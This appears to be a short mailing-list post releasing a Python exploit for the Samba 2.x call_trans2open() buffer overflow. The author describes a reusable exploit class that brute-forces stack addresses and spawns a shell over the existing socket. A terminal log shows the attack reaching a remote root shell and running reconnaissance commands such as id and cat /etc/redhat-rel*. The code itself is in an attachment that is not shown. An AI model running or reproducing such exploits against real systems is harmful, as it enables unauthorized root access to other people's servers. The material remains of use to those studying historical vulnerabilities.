samba 2.x call_trans2open() exploit

[noir sin <noir () olympos org>]

0day is fragile! one day it's your precious, next day its worthless ...

anyways i put together this SAMBAExploit class in python which might be
interesting for folks since it's reusable in many other stuff ...

python cause; write once a heap, stack or fmt string exploit class and the
rest is just to "cp old_exp.py new_exp.py; vi new_exp.py"

exploit bruteforces all possible stack range and dups the already
connected socket for spawning the shell

greets to: Michael Teo for pysmb, lsd-pl for linux/findsck shellcode

- noir

noir@juneof44:/tmp/samba_exp2 > python samba_exp.py 172.17.1.132
[*]  brute forcing well known addr range ... [*]
trying; retaddr: 0xbffed404
trying; retaddr: 0xbffed504
trying; retaddr: 0xbffed604
trying; retaddr: 0xbffed704
Linux localhost 2.4.9-e.3 #1 Fri May 3 17:02:43 EDT 2002 i686 unknown
cat /etc/redhat-rel*
Red Hat Linux Advanced Server release 2.1AS (Pensacola)
id
uid=0(root) gid=0(root) groups=99(nobody)
exit
*** Connection closed by remote host ***

Attachment: samba_exp2.tar.gz
Description: